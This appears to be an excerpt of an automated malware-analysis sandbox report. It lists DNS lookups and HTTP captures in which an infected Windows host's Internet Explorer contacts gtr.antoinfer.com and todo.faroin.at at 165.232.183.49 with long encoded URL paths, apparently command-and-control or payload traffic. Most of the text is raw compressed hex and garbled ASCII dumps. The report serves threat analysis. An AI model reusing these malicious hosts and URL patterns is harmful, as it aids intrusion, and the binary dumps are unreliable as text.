                              Jul 5, 2021 16:52:45.206682920 CEST8.8.8.8192.168.2.50xf2f9No error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                              Jul 5, 2021 16:52:49.654650927 CEST8.8.8.8192.168.2.50xdae5No error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                              Jul 5, 2021 16:52:56.007304907 CEST8.8.8.8192.168.2.50x76c2No error (0)gtr.antoinfer.com165.232.183.49A (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:32.490406990 CEST8.8.8.8192.168.2.50xd2c6No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:33.031008959 CEST8.8.8.8192.168.2.50x43c5No error (0)todo.faroin.at165.232.183.49A (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:34.205434084 CEST8.8.8.8192.168.2.50x7a98No error (0)todo.faroin.at165.232.183.49A (IP address)IN (0x0001)
                              Jul 5, 2021 16:53:35.439306021 CEST8.8.8.8192.168.2.50x1cc4No error (0)todo.faroin.at165.232.183.49A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • gtr.antoinfer.com
                              • todo.faroin.at

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.549717165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:52:45.440840006 CEST1627OUTGET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:46.348056078 CEST1628INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip
                              Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9a b7 76 83 40 14 05 3f 88 42 20 72 49 ce 39 d3 91 a3 c8 f9 eb 8d 1b 15 b2 8f 81 dd b7 f7 ce c8 72 39 e8 d6 a9 86 e5 74 ed b0 bb d2 dd 64 5d 14 d5 d4 9e 1d 9a 37 7c 39 e5 c5 6e 94 f4 ef 8a 17 0b df b5 5e df 85 5e 78 d3 7e 79 ed b6 c2 0f 97 b6 5d 63 85 46 9f 56 a0 0b 9e 0a d8 e1 80 c7 8a fe 90 8f 6b 93 d1 21 e4 13 b7 79 9f 5a 66 97 31 33 94 e4 a4 8b 10 da 9d ef 57 8d 00 1b bc 34 b0 b0 18 64 fe 52 b2 7c 47 65 d0 91 f5 0d 07 85 3c 4f be 2c 9c 06 2e 32 c0 35 c1 72 f8 68 e1 8e 6d 8a 2a 66 2b 0e 4e 92 35 59 e2 57 94 5c 6f 08 35 9b e5 7d d1 ed 42 bc 59 21 ec c0 ad 41 6c 61 16 fb 52 1f 88 96 3f d6 8c 55 ab f9 dc ef eb 5a 6a c1 7a 20 b3 91 7e 7c a6 dd 3b 03 9a 9d 8d 7d 64 a3 b0 8c 80 13 9c c9 61 09 5e 55 40 48 29 ee 47 ab f1 93 0e e2 ec e9 c6 8e d2 ea 0f 53 da 79 ce 81 7b 1f 3a e3 68 7f a2 53 44 dc 6f d5 b7 cf a8 8f 34 2d c0 b4 a2 4a 7a 6c ca b5 97 35 ef 7b 48 0e 93 34 b1 46 0c 9e 11 ae 11 46 bc e4 38 e8 d7 fa 79 62 dd 8f 19 37 af e8 e6 c9 0d c2 e1 26 11 7a 1c 9e f4 37 d1 e5 3c ba 6c 17 8a 12 02 97 d0 a6 82 d3 10 d3 f8 e7 c8 d1 b2 17 f4 e0 1e 19 70 a8 21 0e b9 d2 52 b1 9a c4 20 f1 f6 80 46 c3 03 b7 44 85 28 e3 ca e3 77 b7 e6 28 52 34 1b f8 11 84 2c 13 46 85 fd 5e 9e fb 84 a6 a5 38 82 6b 9f 2e b2 da 16 df 88 86 3c dd e1 17 bb 64 83 bc da 36 f2 43 b3 5a 66 83 fc 1d 04 38 25 79 83 6a be d3 d8 0f 9c 4b 2e 77 9d 11 43 13 fb ec cb 1c 14 40 63 c3 c1 85 1e db 81 75 85 65 82 29 96 85 d6 98 c4 62 3f b9 fd 52 0c 9a 75 62 d9 1e 29 57 76 c2 7d 9b 39 02 67 f8 c7 6b d7 29 2d ad 44 9e a3 f1 b8 28 6e e4 ac 58 f3 f7 72 bc 9e 47 4b 77 10 2c 44 57 c9 2b 8f c6 3a b6 b7 7e 7b d6 0c 40 9c 23 3e 31 30 7b 8a ed a3 32 c4 90 81 d6 96 e5 50 32 ef 17 0f a3 d8 c3 73 6b 8b 89 e4 2e db 99 81 8d 99 7c c1 63 99 f2 59 e7 22 39 90 bd 92 c0 2f 21 d9 e0 c2 15 de 4f dc a2 6f 82 80 1d 3a 72 48 79 5c 41 35 b6 12 c4 fe 74 79 83 c1 dd 21 db 08 03 18 a6 b1 af a5 a9 72 2c b4 08 82 84 41 86 9e 9c 5b 99 7c cc 05 38 e8 01 eb 99 38 4e 87 63 fb ca 4f c8 cc 5d c7 45 a3 4c b6 21 f0 5a b4 37 3f 0a 78 08 87 35 ce cd 6a 83 f2 0c c8 96 8f cf 77 52 f0 12 53 e6 b5 a2 b9 20 36 7d e5 7c 78 1e dc b1 aa 19 7e 83 36 6c 37 62 36 0d 92 c7 c6 81 7e ab a7 af 91 8c e7 63 c5 7d 46 ae b7 be ae 16 72 9b c8 21 70 71 ee 64 fd 91 b7 88 e9 d2 01 39 a2 65 3f d7 fe 3a 34 a7 09 f1 48 2d b7 8a 94 f9 4d 98 61 3a df f3 10 be 91 60 88 2f 34 e5 98 25 5f b4 76 8d fb 75 26 07 7e 7c 3e c7 83 e1 97 00 1d 24 c0 6b 54 c6 da a5 4a 7e 81 51 c3 24 39 5d 4e 3d ae f4 6f 14 7d 69 50 1e c4 06 75 f2 99 68 85 99 c4 93 91 f4 e8 73 54 30 1a 27 0c bb 15 1f 26 66 aa d4 7c 0c e5 eb 3b ad 82 a1 3b 64 96 c9 57 00 43 51 9e 4c de 1a 65 b3 7d 3c 49 04 67 4f e3 e2 df 64 a6 de 1c b6 d1 5c b4 4a 27 4d 2e 61 ef c0 e9 d4 1c eb c4 00 fb 69 58 9e 0f a1 6f e3 1d 9a 9a fc a6 d0 54 1f 07 63 7a f5 86 ef 3d b2 af ea 70 f0 e1 1e fd f1 70 3b 65 f9 31 e0 ce 18 53 da fa 21 b0 73 3b a3 58 d2 a9 76 bf 8c df ea 1e 3a 6b 71 19 9c 4b c1 59 b5 4f f5 2a dc 18 18 04 f4 1f 8e 22 32 ea a3 39 63 d0 82 88 cf e2 a1 77 69 2b 32 26 fa 79 e8 b1 e5 6b 63 30 dd cf 4a 15 4b 06 b8 38 21 68 cd ed 6a 1d 62 7d 96 41 89 47 8c a0 97 cf 3e 3e ed 54 e5 1c cb
                              Data Ascii: 2000v@?B rI9r9td]7|9n^^x~y]cFVk!yZf13W4dR|Ge<O,.25rhm*f+N5YW\o5}BY!AlaR?UZjz ~|;}da^U@H)GSy{:hSDo4-Jzl5{H4FF8yb7&z7<lp!R FD(w(R4,F^8k.<d6CZf8%yjK.wC@cue)b?Rub)Wv}9gk)-D(nXrGKw,DW+:~{@#>10{2P2sk.|cY"9/!Oo:rHy\A5ty!r,A[|88NcO]EL!Z7?x5jwRS 6}|x~6l7b6~c}Fr!pqd9e?:4H-Ma:`/4%_vu&~|>$kTJ~Q$9]N=o}iPuhsT0'&f|;;dWCQLe}<IgOd\J'M.aiXoTcz=pp;e1S!s;Xv:kqKYO*"29cwi+2&ykc0JK8!hjb}AG>>T
                              Jul 5, 2021 16:52:46.348079920 CEST1630INData Raw: b0 68 28 fb ca 64 02 0d 6b b8 85 cf 7c 56 10 9a 37 eb c0 fa d1 6b 5a 2d 99 0a 20 2e 5b c6 42 3f a7 48 2d fc 07 e5 ba 0e 88 62 31 9e 79 d1 fc 55 d1 81 91 32 5a 1e a4 0c 13 d2 05 f7 e0 0f 35 85 60 da cb d4 3a 3d 55 09 1d 28 48 50 da 02 0c 1b 54 9f
                              Data Ascii: h(dk|V7kZ- .[B?H-b1yU2Z5`:=U(HPT>ewk_VL?Aqhb2~}9bE!#x*N#g6):D4JLC.632bKpY.L\K|dFWa>(UfXa
                              Jul 5, 2021 16:52:46.348092079 CEST1631INData Raw: 35 94 de dd 6f 6c 2c 3f a2 a9 d2 d0 48 f0 59 bf 71 95 3e 00 08 36 ae a9 52 61 3e dc 9f fe 24 cd 1f 5f 95 df 52 91 ae 1c 9c ed 26 03 64 f9 18 2e dd d0 97 98 e5 31 8b 64 68 6b 75 59 b2 a0 82 59 6f 2c a9 fa 7c 9f 23 06 55 26 b9 1c 26 4f 17 8a 6d 25
                              Data Ascii: 5ol,?HYq>6Ra>$_R&d.1dhkuYYo,|#U&&Om%'VU+%=F8J* ~@LUCa|K]!Lc_r3xOx`G4pPGo|4@|ZaGVLJ'*
                              Jul 5, 2021 16:52:46.348104000 CEST1632INData Raw: 71 51 8c 65 61 bf e9 49 f8 c1 7f 40 cb 67 08 d5 a9 88 32 fc 58 e8 e4 78 82 fa c4 c0 96 d8 00 cb 62 91 1a 06 4d 8d 2a bd 99 d1 f4 ea d7 20 d6 09 ce 6e 00 3d 3e c8 da 49 51 4e 28 63 d4 f0 8d 1a 01 30 db b0 3f aa 52 ab d6 93 29 7d 91 01 38 49 58 52
                              Data Ascii: qQeaI@g2XxbM* n=>IQN(c0?R)}8IXRQbpT:d8;(wkWm9iZ_E8z>C]fj@aj:2lD_9&>`sZf3s@EM{@u8;o`wvh#%Q
                              Jul 5, 2021 16:52:46.348114967 CEST1634INData Raw: 16 00 d3 24 c0 27 e6 f1 a8 2e bb 6e fb e7 70 58 da 5b 4c 7d c8 9f d8 4c 99 7e 45 2c 8f ae 2f 8e bc db ef a4 f3 1d 44 74 89 bd 18 ea 59 4d 92 41 7b 5e 00 1a c8 0c 79 5a 74 fb a5 72 70 b8 ee 0e 0c d4 15 0d ab 56 da de 06 a3 a2 b5 21 81 86 59 59 2c
                              Data Ascii: $'.npX[L}L~E,/DtYMA{^yZtrpV!YY,(4.g377`b*9m\!TMl:glL113U+lhrUzt;ml^%&5P(b,GuM]*\Eu{Ty.
                              Jul 5, 2021 16:52:46.348126888 CEST1635INData Raw: 6f 63 97 47 d1 ae 98 56 00 02 01 19 9c 34 f8 88 22 bf 11 a5 25 ad dc 48 d6 d8 63 3b be ed 7a fd 45 60 5e f8 55 3f 31 d3 65 94 60 0d 4e bd 1d dc 22 b0 ad 83 c1 d7 1c 57 f0 70 d6 e9 e7 4e 45 27 f6 a8 46 8f 23 92 96 07 7f a4 85 41 65 ba 14 e5 7e 4d
                              Data Ascii: ocGV4"%Hc;zE`^U?1e`N"WpNE'F#Ae~M.:?0/!Bx+_W^\}SB\=NQ-\qF2jY)|Pdg~i hvi/kNnf9R_da>#>~n,2
                              Jul 5, 2021 16:52:46.349365950 CEST1636INData Raw: ae 41 9c 26 c8 b9 37 c6 1a 7e 7a 48 b2 02 60 7e 7f f1 a1 c0 08 5f b9 64 f8 e4 ec ef 09 9c 92 14 62 21 ba a4 36 c2 63 b3 07 ac a9 21 6a 26 70 6a e8 f0 a0 23 a6 1a b5 8a 3d 24 13 be bf 99 0c b2 d2 a2 49 a2 b1 af af 9c 8c c5 8a c8 d6 ce 0c 5d a3 53
                              Data Ascii: A&7~zH`~_db!6c!j&pj#=$I]S .Vr&VH71a'JIz}TB#5"xjZ~R~G'_ 6zm'RgOU7NH4w`4/'G<\cMb2o`@$$
                              Jul 5, 2021 16:52:46.349381924 CEST1638INData Raw: 77 83 df 9d 33 42 fa 14 a9 28 19 4a 73 08 c3 20 06 ed 9a 8e d8 c0 f3 07 17 c4 21 7c 62 e6 72 39 ec fb 38 dc 5e 04 1f 58 fb e5 95 46 4b 54 7c 9e e6 b4 03 d1 b7 76 6c 2e f8 62 a8 53 90 37 2a 94 08 ae 54 66 82 89 85 7b 65 c4 62 3c ae 18 28 eb 28 d3
                              Data Ascii: w3B(Js !|br98^XFKT|vl.bS7*Tf{eb<((h%1PU@5pl^-1?BR:|Fu4L*v18lZK(V!QV,jNDc'052TPMWQH ^}hK':*ufFi9qI
                              Jul 5, 2021 16:52:46.349400043 CEST1639INData Raw: 7f f2 5a 13 af d3 45 93 e7 e3 f3 33 44 7f c2 a8 87 f4 76 4e f0 48 e5 47 ed 2b ef a0 f6 c1 1d 31 68 73 94 40 4e db 31 7c d0 30 f3 cc d3 0e 6b 5b 94 dc 7a 14 ec a3 45 02 ab 1e 7e c4 2a 9e f0 08 7b ab ee f4 ee ba 8a 07 bb 90 e3 fd be e4 f2 76 c0 5d
                              Data Ascii: ZE3DvNHG+1hs@N1|0k[zE~*{v]Pdg7jn=UlCi^]9`^'irW!Hr2U:>my<#9IO2i3E?Wpi4>hI6AV-m-<qQav0$x
                              Jul 5, 2021 16:52:46.349416971 CEST1641INData Raw: 5b bb 73 e8 f4 92 2e 99 ee 15 2f 0f d9 cd 32 1e 60 64 89 d0 13 8d df 13 96 1b 87 66 3b c8 db b9 0b 27 09 a0 02 e3 6b 6e 16 02 2f bf b7 b2 45 f5 5a e4 36 a9 dc 16 17 b3 4f a0 fa c5 90 4d ae 4c 41 ab 59 1b 6f 3a 93 b3 fa eb bd 06 fd 0e 1e b8 3f 8a
                              Data Ascii: [s./2`df;'kn/EZ6OMLAYo:?r_[Ne\X*9Nt&lV{c%9v|~SlV'6+oT[YcQB-~BD@!hxMO<BJ?!f,NJ;I4"vd<+K
                              Jul 5, 2021 16:52:46.542063951 CEST1642INData Raw: 5c 06 5d 25 e1 8c cc b7 db 05 02 76 4d ed 07 9d c0 eb a6 85 2c f1 17 fe f9 11 1f b9 67 3e e0 94 f4 2b e0 6e 23 92 c1 52 9e 13 5a f6 59 fa d5 d6 c8 8d ad 1e 71 2d 9e 84 20 8b fc ab af d5 0f 93 14 a0 94 eb 93 c1 63 28 ca 6f 9f 8c 6a 17 29 f3 45 71
                              Data Ascii: \]%vM,g>+n#RZYq- c(oj)EqR)8Z_8p3.~'2bdV:c=qalHr8;[!{?vMPQtbCzWSFnb?vFpBXc<tzSOfVE"5=


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.549718165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:52:47.774095058 CEST1831OUTGET /favicon.ico HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:48.320102930 CEST1832INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Content-Encoding: gzip
                              Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.549720165.232.183.4980C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              TimestampkBytes transferredDirectionData
                              Jul 5, 2021 16:52:49.870625973 CEST1833OUTGET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:50.788218021 CEST1835INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip
                              Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b b5 82 83 40 14 45 3f 88 02 08 5e e2 ee 41 3b dc dd f9 fa cd b6 29 c2 ec cc 9b 7b cf 49 36 b2 d9 7d 2e f9 2b 07 c7 7e 31 df 25 c4 63 ba c0 e1 34 4c 46 6d b7 79 2e 38 d2 a6 85 7d 39 b8 74 f0 e0 74 40 58 33 25 43 0e 9e fe c4 aa 1e 26 5c 50 23 19 0b 66 fd d2 06 28 7a b6 75 10 99 06 63 4b 9a 5e b9 c0 c5 70 0c cf 8b bc 8b 7c 20 fe 63 73 25 ee 75 c4 77 88 4a 14 04 3e 4a b5 2b 5f 36 15 2e 37 94 04 a6 01 dd b4 1a fa 57 f3 bf 25 ff 59 d2 9a d0 a0 02 21 e8 e7 1a db ec 75 8a 64 5b d5 14 9d 4f 0b e5 1e bf 5a dc 33 23 cf d2 ae d1 16 a7 a0 e8 9b 32 9f f0 fa 22 86 9d 76 28 fa a6 29 d2 2b 43 16 cc 1a 99 11 cd 03 81 4c ad 82 57 92 e7 be d8 ec f9 e1 f8 35 27 31 ed d2 29 95 3a d3 e8 35 dc 82 4c ca 1f c2 c7 a4 f2 1b c0 2c c5 3f 6a e0 4c 16 2d 30 6d a1 af 16 e8 d3 d6 2a 91 c0 77 5b 0b cc 77 8b 76 2a 8f 4c ce ec e9 61 fb a0 67 d7 09 bd 51 2b 3e e3 f0 96 3e 9f 97 b8 9f f4 bb b9 4f 0b 41 20 df cb 4a 08 5b a6 20 d2 37 5d 2f 31 7e 41 72 19 8e c4 a7 4a 76 c3 ae c2 d3 d8 0a 32 e9 0d e0 36 5c 73 3f e2 88 e5 38 26 5d 5e b4 0d 1e 8d 2f 70 d2 37 b9 1b 7b 53 ac c6 4b d0 bd 53 2a 49 77 44 91 c8 a0 f7 65 c0 bf 13 80 ea ae 8e 22 ea fa 50 ca d6 04 38 4e 5a 14 27 0f 3a 35 fd 6a 2d cd 77 1b 40 3e c5 e6 d2 6e 11 50 77 71 1d b8 72 58 57 9d 6f 88 56 9a 1b 37 28 7a 0e 4d c8 23 3e 73 dd a9 04 48 6e 90 74 3d 5f fa 7b 3d 54 b2 0d 13 b6 32 8c c8 34 af 5b db 2f ab 30 c7 b6 11 8a e7 31 91 b5 37 25 0f d7 1c 66 ef 33 5c 03 be 4c 39 f9 fa 99 a7 95 7e 65 31 33 f6 7e 72 83 1d 2d 33 d6 8d 60 b2 59 05 32 1c 2c cf c3 25 91 64 d3 5b 7f 5f 3c c5 57 9b 96 9f b6 05 d6 56 2a 07 8d 18 bc b3 a1 99 af 80 5e 24 3d 84 0b 8c 9d cb 08 17 e6 1a ae 6a 92 a7 98 77 50 59 e5 74 e1 57 71 f8 4f 34 4e 06 ae 47 e9 1c 8c 27 39 c8 5f 23 5c ed 44 63 9e 60 ef 4c ec 81 92 b6 2a 4a fc 6e 12 51 c7 38 24 5b e8 4a ac 01 41 69 ee 56 2d 58 39 bf a7 6c 38 c5 29 c0 16 11 91 78 4d e3 30 04 b0 cd ea 9e 84 19 d4 f0 d5 1d 4b c6 6a 95 55 05 55 1f 42 11 e6 db a2 3b e3 24 b6 bb 65 e9 07 a6 0d 16 ce ca 63 83 b5 5e d1 75 de 35 10 9d 2f 93 57 3e 0b 23 57 4e 35 2c dc 99 6c ed ab c3 d8 b8 ca e1 58 6e 86 b3 58 98 67 eb dd 9d 98 88 1e d6 df 69 45 b2 49 32 bf f3 70 7c 21 2d cc b8 70 1d fd de 11 c3 14 59 58 86 34 55 a7 26 ba 9a 7c 3b 88 d0 d5 1a a3 4f 08 b9 5a c8 a3 cc c1 7e 18 c3 cc bf fc 5d a3 f1 4e 37 e1 e0 25 d6 e7 39 c0 14 d9 b8 2d bf 89 b2 2a 9d a6 b8 46 10 66 6d 40 2f e4 20 d3 21 7f a4 ae 29 d8 76 1b 2a 31 05 64 14 41 2c 47 aa 0e 94 53 80 6b f0 d1 45 e2 20 99 4e 00 2a 68 b2 d7 12 04 0f fd 35 5c 00 5e 71 80 e1 17 27 31 75 09 c6 11 62 5a ad 8a f8 4e 1f c8 5c 63 4c 77 83 cd e2 aa 34 b0 18 e3 41 1f 95 e8 f3 cd 9d 0b e1 ed 92 71 df 69 58 33 9f 73 56 55 2c 2b d1 7e c2 46 8e 5f 9a c8 e8 4d 4e fd e0 dc 59 d4 0c 3c 2c dd cc db 15 d6 7d cb 7a 18 c1 c9 7e 0e 3a 74 8b 4c c0 90 63 8b de 25 28 70 f9 d0 7c c4 bb 2e c6 e7 11 5e 8f 15 7e f1 a8 e4 23 58 64 42 77 b3 1f 23 97 eb 4c 37 66 db 9c 2b 87 f2 a9 e1 37 c7 c1 79 98 67 e3 7e 58 9f ca 2b ae c2 63 de 98 96 33 63 34 1c 41 7e a8 a2 9a 3b 53 6e 3f ec f7 cb 52 5e 28 d9 cd c2 fb d7 00 1b ab 5a 0e 4b ef 7f dc 23 bb 10 58 0e 6d 91 bc 10 8c a6 f3 24 68 05 82 8d 9c 07 fa
                              Data Ascii: 2000@E?^A;){I6}.+~1%c4LFmy.8}9tt@X3%C&\P#f(zucK^p| cs%uwJ>J+_6.7W%Y!ud[OZ3#2"v()+CLW5'1):5L,?jL-0m*w[wv*LagQ+>>OA J[ 7]/1~ArJv26\s?8&]^/p7{SKS*IwDe"P8NZ':5j-w@>nPwqrXWoV7(zM#>sHnt=_{=T24[/017%f3\L9~e13~r-3`Y2,%d[_<WV*^$=jwPYtWqO4NG'9_#\Dc`L*JnQ8$[JAiV-X9l8)xM0KjUUB;$ec^u5/W>#WN5,lXnXgiEI2p|!-pYX4U&|;OZ~]N7%9-*Ffm@/ !)v*1dA,GSkE N*h5\^q'1ubZN\cLw4AqiX3sVU,+~F_MNY<,}z~:tLc%(p|.^~#XdBw#L7f+7yg~X+c3c4A~;Sn?R^(ZK#Xm$h
                              Jul 5, 2021 16:52:50.788268089 CEST1836INData Raw: 72 5e 22 38 89 9a b7 70 2b ab 1b 19 71 44 62 14 ec c6 9e a5 67 61 0a 39 86 d6 91 bc ab 2a 0e 86 26 5b 83 31 e6 6b be 5b eb db 4b 29 ad c1 19 56 6f 20 26 c3 26 22 89 ca 3b 7d 22 ce fb a8 cc d2 7e 1f 3a 3b 51 99 72 4d e3 40 18 79 fd 30 4d 58 ec 4c
                              Data Ascii: r^"8p+qDbga9*&[1k[K)Vo &&";}"~:;QrM@y0MXL}vovS9B6(@#,QpjTn5&{Wor!tiC|tqI-1>'}^sNszHS.gI!!=/`S&
                              Jul 5, 2021 16:52:50.788285017 CEST1837INData Raw: 5b c5 30 f5 7b e2 11 84 d5 cb 21 14 81 fa de 8f b2 92 46 58 73 36 28 85 dd e6 7e ba f6 33 4a 58 8f 2a b6 f4 d9 d8 e6 07 85 ae 9c 81 74 47 c8 2b c7 04 6f 26 e4 fd 49 9f cd 4c 32 ec 77 07 a8 0d b3 3a 60 1c 61 e8 b5 57 3f 98 d8 d5 fe aa c9 a5 d5 e8
                              Data Ascii: [0{!FXs6(~3JX*tG+o&IL2w:`aW?)-pH5qh(|pRN=?jOVkC$eS\L\W3Q\F,iyqS%//PA,0EZ(6)^4OP
                              Jul 5, 2021 16:52:50.788299084 CEST1839INData Raw: 24 7c 16 e9 37 16 e2 f8 21 71 ca 36 8d d1 99 13 94 4a 46 e6 31 7d 4d 35 7e d1 c1 48 3c 80 38 d9 e4 59 02 cf 07 2f 3b ac 5e 08 37 25 1f a1 9a 02 f2 1c 62 39 c9 91 fb 53 d4 44 64 b9 af f9 62 01 3b 36 4b fd 8d bc 2c 13 eb 4d bb cc 0f 37 b2 88 3c 7c
                              Data Ascii: $|7!q6JF1}M5~H<8Y/;^7%b9SDdb;6K,M7<|\ws@|Gzg^&|iJMxn_r-nXqZ'h0&,5,bDVx e@m,?\iPOq#Uun_}8w>
                              Jul 5, 2021 16:52:50.788324118 CEST1840INData Raw: 3d b1 cb 72 12 b4 49 2b 34 0a 11 78 8e 99 5b ad b6 e6 e9 34 87 c3 8e 44 b8 ef be 69 4d 5a b9 1b 3e 5f 9d aa a7 6a 11 71 56 f1 cd 90 19 b9 be 08 e2 9a 6d b2 b8 c5 2a f0 2e 05 50 06 6d 17 be b8 f7 fd 48 c3 c5 fc 8b 95 07 8a e5 fe 4a 16 b8 67 8d f2
                              Data Ascii: =rI+4x[4DiMZ>_jqVm*.PmHJgQ>,gIC.a4|c?c-v R[\Os!<Y}f#o(@'-)QKGdVSH?Q30XsVEhX5P5oz
                              Jul 5, 2021 16:52:50.788345098 CEST1841INData Raw: 9f 92 b8 ec 92 f8 37 45 12 03 97 08 cc b1 4d 3a df cf 57 e6 b5 8e 42 5c 35 25 91 35 6e 90 67 90 4f 29 31 c0 c3 f2 b3 da 6a 21 5c 25 63 20 2c be 6f 7d 3a 1c 45 83 47 35 35 46 d8 bc 09 62 03 c6 e3 f1 ec 0f f5 34 cc 48 69 f0 52 7e 26 6f 52 7d e0 a1
                              Data Ascii: 7EM:WB\5%5ngO)1j!\%c ,o}:EG55Fb4HiR~&oR}r/~pnIg{wE3b)?~fLZ%'F~b|uNrP!cr4<>9p{s`]CHO*;#JW0~</-V7T91
                              Jul 5, 2021 16:52:50.790205956 CEST1843INData Raw: b7 b9 39 3b 16 00 9d 6f b1 6f 95 3f fb 64 52 2e 01 d2 b2 71 f4 2d 9d 73 5c 5d 39 28 66 61 3b 30 13 c4 c6 8c 11 bc 8f 82 bb 8e 84 19 dd 34 82 7c 48 b7 e4 16 6b d5 1b 7d 1b f0 0d d8 34 4e 68 5f 08 a2 fc 8b 10 e8 1b 00 ad e9 b7 3a 93 e0 e9 8c cb 6e
                              Data Ascii: 9;oo?dR.q-s\]9(fa;04|Hk}4Nh_:n.BG/Ca=)Y?(lC.~^4dk"+;*H,W.E^d|#_I@S'q='B!J.=H8
                              Jul 5, 2021 16:52:50.790234089 CEST1844INData Raw: f2 e4 a8 e5 e9 69 d4 eb 48 5c 5e 03 59 ff fc c8 48 d9 86 44 21 8a d9 b2 b0 cb 64 69 82 a9 ed 1f f9 a3 b0 1d 6e 87 c5 02 62 86 aa e5 0d e1 cf 3e 95 2e 5a 8d 7f ab 7f 0c 2f 03 95 bf bb d5 19 01 fb 27 c3 a1 22 9b d4 04 ad ec 07 ee c3 0a 3a a8 b7 63
                              Data Ascii: iH\^YHD!dinb>.Z/'":c.-];8DS{8Q$<V&4`G@RgKQ``C#s{gf@|P0br[j,TuXdDOPsMhY5/G<<5u
                              Jul 5, 2021 16:52:50.790252924 CEST1846INData Raw: 7b 74 2e cc 3e ec 1a 90 9f 8d 7d 54 cf ef 81 2f 2a df 73 d7 67 3a 4b b8 f3 11 04 1f 31 d1 f7 10 b3 9a a3 1c 73 86 63 45 3b 81 0d 4d 85 fc ed 01 6c c5 8a 29 d1 e0 b1 12 b3 64 ff c7 44 a9 76 9a d8 17 16 f6 44 23 e5 d2 d1 31 57 e7 6e a0 fd 89 c6 ce
                              Data Ascii: {t.>}T/*sg:K1scE;Ml)dDvD#1Wn_udC/.2upA7As2'C.lWCYO.M-xG:?2|`+qKw#Bsu,}& ycWb?].8<-W3<
